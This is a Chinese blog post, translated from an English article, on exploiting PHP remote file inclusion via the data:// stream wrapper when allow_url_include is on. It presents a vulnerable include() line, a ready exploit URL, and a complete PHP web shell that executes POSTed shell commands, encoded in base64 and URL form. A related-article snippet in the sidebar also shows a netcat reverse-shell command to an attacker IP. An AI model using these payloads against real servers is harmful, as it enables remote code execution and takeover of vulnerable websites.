PHP RFI

最新推荐文章于 2023-10-05 22:39:50 发布
最新推荐文章于 2023-10-05 22:39:50 发布
阅读量179 收藏
点赞数
分类专栏: 渗透测试 文章标签: php shell 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82608790
版权
原文地址:
https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/

PHP5.2及后续版本支持流封装。流封装的基本原理是通过另一个协议或服务写一个接口,然后可以使用你需要的函数获得数据。
例如 

$session=ssh2_connect('example.com',22);
$stream=fopen("ssh2.tunnel://$session/remote.example.com:1234",'r');

另一个使用data://流是解码base64字符串: 

echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');

流可以用于file_get_contents,fopen,include和require等。

5.2版本之后,如果allow_url_include开启了,我们可以使用数据流来包含可执行的PHP代码。例如: 
<? include($_GET['file'] . ".php");

通过把一个字符串使用base64编码,然后使用url编码该字符串中的特殊字符,我们可以成功执行脚本。如下我们可以使用上面的脚本执行phpinfo来获得环境变量 

<? phpinfo(); die();?>

:::php
// Base64 Encoded
PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg==

// URL + Base64 Encoded
PD8gcGhwaW5mbygpOyBkaWUoKTs%2fPg==

// Final URL
index.php?file=data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs%2fPg==


上面的die语句用来阻止执行脚本的剩余部分或追加在数据流后面的不正确解码的".php"字符串。
除此以外,还可以执行shell命令,如下
PHP Payload: 
<form action="<?=$_SERVER['REQUEST_URI']?>" method="POST"><input type="text" name="x" value="<?=htmlentities($_POST['x'])?>"><input type="submit" value="cmd"></form><pre><? echo `{$_POST['x']}`; ?></pre><? die(); ?>


Base64编码后的payload 

PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8+IiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8+Ij48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0+PHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8+PC9wcmU+PD8gZGllKCk7ID8+Cgo=


Base64 + URL编码后的payload 

PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2BIiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT82BIj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2BPHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8%2BPC9wcmU%2BPD8gZGllKCk7ID8%2BCgo%3D


运行php shell
[img]http://dl2.iteye.com/upload/attachment/0102/9930/3464ce7e-1105-386e-819a-63bfe2740f97.png[/img]
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
扫描php代码,PHP RFI扫描代码
weixin_33250808的博客
03-11 175
escan_banner();if( $argc < 2 ){ escan_usage($argv[0]); } else{$stime = escan_get_mtime();escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );$etime = escan_get_mtime();print...
PHP RFI 的小tip
weixin_34235135的博客
04-19 60
有关PHP include的帖子网上已经很多了,wooyun的知识库里面也有一篇总结的很好的文章,传送门:http://drops.wooyun.org/tips/3827,今晚在看书的时候看到RFI绕过包含,总结常用的技巧有:%00截断,利用系统对目录最大长度的限制绕过,使用?绕过。但是前两种方法在PHP>5.3之后就没用了,唯独剩下?绕过可用。 于是乎想到的问题是:除了使用?,还有其他...
WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
siu~
09-07 244
1、文件包含-原理&分类&危害-LFI&RFI 2、文件包含-利用-黑白盒&无文件&伪协议
PHP渗透技巧拓展】————3、LFI、RFIPHP封装协议安全问题学习
Fly_鹏程万里
02-01 799
本文希望分享一些本地文件包含、远程文件包含、PHP的封装协议(伪协议)中可能包含的漏洞 目录 1. 文件包含的基本概念 2. LFI(Local File Include) 3. RFI(Remote File Include) 4. PHP中的封装协议(伪协议)、PHP的流式文件操作模式所带来的问题 1. 文件包含的基本概念 严格来说,文件包含漏洞是"代码注入"的一种。"代码注入"...
php文件包含
m0_64361111的博客
02-28 1422
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
php代码审计文件包含,PHP代码审计之远程文件包含(RFI
weixin_42512509的博客
03-10 332
有位叫做普瑞斯特的大牛针对PHP的web应用列出了下面几种攻击方式:1.命令注入(CommandInjection)2.eval注入(EvalInjection)3.客户端脚本攻击(ScriptInsertion)4.跨网站脚本攻击(CrossSiteScripting,XSS)5.SQL注入攻击(SQLinjection)6.跨网站请求伪造攻击(CrossSiteRequest...
PhpMyAdmin setup.php RFI Attacks Detected
cnbird's blog
04-23 1754
SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks.  I was looking in our central ModSecurity A
php project management,PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
weixin_31184569的博客
03-24 82
# PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities# http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz# DORK : "PHP Project Management 0.8.10"# POC : RFI...
php文件包含漏洞详解
最新发布
weixin_61835841的博客
10-05 428
文件包含漏洞相关知识及复现
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
在本文中,我们将深入探讨如何利用PHP的远程文件包含(Remote File Inclusion,RFI)漏洞,即使在PHP环境中配置了禁止从HTTP/FTP URL包含文件的情况下。远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要...
XSS,RFI扫描者
01-28
XSS(跨站脚本攻击)和RFI(远程文件包含攻击)是两种常见的网络安全漏洞,主要用于攻击Web应用程序。这两种攻击方式对网站的安全性构成严重威胁,因此了解它们的工作原理、防范措施以及如何进行扫描至关重要。 XSS...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
PHP远程文件包含(RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1667
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4916
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
arachni手册
iteye_16188的博客
10-30 1373
[b]快速开始[/b] [b]帮助[/b] 使用-h来查看arachni功能 arachni -h 当扫描进行时,可以使用回车键来暂停/恢复,中断,延缓执行,以及查看一个发现的问题的总结。 可以这样运行arachni: [code="java"]arachni http://test.com[/code] 将会加载所有的checks,在/plugins/defaults下的插件,审计...
[译]解密MSSQL密码
iteye_16188的博客
03-26 1093
原文地址: [url]https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/[/url] [url]https://blog.netspi.com/decrypting-mssql-credential-passwords/[/url] (一)Linked Servers MSSQL在数据库中hash...
netcat反弹shell
iteye_16188的博客
09-01 741
注意:如果想要在小于1024的端口做监听,那么需要root权限 一)通用场合 1. 自己机器:nc —nvlp 443 2. 目标机:nc attacker'sIP 443 —e /bin/bash -n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来) 二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_...
the-backdoor-factory
iteye_16188的博客
11-27 727
参考:[url]https://github.com/secretsquirrel/the-backdoor-factory[/url] 貌似很有趣,值得深入了解了解 :wink: [b]安装过程[/b] [code="java"]1. easy_install wget "https://pypi.python.org/packages/source/e/ez_setup/ez_set...
Web安全:远程文件包含(RFI)攻击详解与防范
远程文件包含(Remote File Inclusion,RFI)是一种常见的Web应用安全漏洞,它允许攻击者通过将远程URL作为参数传递给`include`或`require`等函数,使得Web应用程序执行非预期的远程文件。这种攻击方式可能导致敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值